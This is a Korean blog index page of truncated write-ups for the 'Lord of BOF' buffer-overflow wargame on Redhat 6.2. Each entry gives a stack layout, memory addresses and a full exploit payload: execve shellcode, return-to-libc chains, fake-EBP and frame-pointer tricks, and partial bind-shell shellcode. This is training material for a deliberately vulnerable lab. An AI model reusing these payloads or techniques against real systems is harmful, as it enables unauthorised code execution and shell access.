Wargames/Load Of BOF 썸네일형 리스트형 LOB Redhat 6.2 - xavius xavius - Remote BOFStack : sin_size[4] + client_addr[16] + server_addr[16] + client_id[4] + server_id[4] + buffer[40] + sfp[4] + ret[4]bind shellcode : \x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\x.. 더보기 LOB Redhat 6.2 - nightmare nightmare - argStack : *ret_addr[4] + buffer[40] + sfp[4] + ret[4]read's temporary buffer : 0x40015000Payload : (python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x10\x50\x01\x40"';cat)|./xavius Using fgets temporary buffer 더보기 LOB Redhat 6.2 - succubus succubus - PLTStack : *addr[4] + buffer[40] + sfp[4] + ret[4]strcpy(PLT) : 0x8048410buffer : 0xbffffa90strcpy_dest : 0xbffffac0 strcpy_source : 0xbffffa90Payload : ./nightmare `python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*32 + "\x10\x84\x04\x08" + "AAAA" + "\xc0\xfa\xff\xbf" + "\x90\xfa\xff\xbf"'` Using strcpy + RTL 더보기 LOB Redhat 6.2 - zombie_assassin zomble_assassin - calling functions continuouslyStack : *addr[4] + buffer[40] + sfp[4] + ret[4]DO : 0x80487ec GYE : 0x80487bc GUL : 0x804878c YUT : 0x804875c MO : 0x8048724"/bin/sh" : 0xbffffa98Payload : ./succubus `python -c 'print "A"*44 + "\xec\x87\x04\x08" + "\xbc\x87\x04\x08" + "\x8c\x87\x04\x08" + "\x5c\x87\x04\x08" + "\x24\x87\x04\x08" + "AAAA" + "\x98\xfa\xff\xbf" + "/bin/sh"'` Using RTL.. 더보기 LOB Redhat 6.2 - assassin assassin - FEBPStack : buffer[40] + sfp[4] + ret[4]leave : 0x80484dfsfp : 0xbffffa88Payload : ./zombie_assassin `python -c 'print "\x90"*17 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x88\xfa\xff\xbf" + "\xdf\x84\x04\x08"'` Using FakeEBP 더보기 LOB Redhat 6.2 - giant giant - no stack, no RTLStack : buffer[40] + sfp[4] + ret[4]ret : 0x804851e system : 0x40058ae0 exit : 0x400391e0 "/bin/sh" : 0x400fbff9Payload : ./assassin `python -c 'print "A"*44 + "\x1e\x85\x04\x08" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'` Using Ret sled + RTL 더보기 LOB Redhat 6.2 - bugbear bugbear - RTL2stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]1execve : 0x400a9d48 exit : 0x400391e0evecve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")"/bin/sh" : 0x400fbff9 &"/bin/sh", \x00 : 0xbffffff7 &NULL : 0xbffffffcPayl.. 더보기 LOB Redhat 6.2 - darkknight darkknight - RTL1Stack : i[4] + buffer[40] + sfp[4] + ret[4]system : 0x40058ae0 exit : 0x400391e0return address : 0x40058ae0Payload : ./bugbear `python -c 'print "A"*44 + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`binsh.c : Using RTL 더보기 LOB Redhat 6.2 - golem golem - FPOStack : buffer[40] + sfp[4] + ret[4]sfp : 0xbffffa98Payload : ./darkknight `python -c 'print "\x90"*17 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x98"'` Using Frame Pointer OverFlow 더보기 LOB Redhat 6.2 - skeleton skeleton - stack destroyerStack : LD_PRELOAD + i[4] + buffer[40] + sfp[4] + ret[4]Shared library : gcc -shared -fPIC -o `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\x.. 더보기 이전 1 2 다음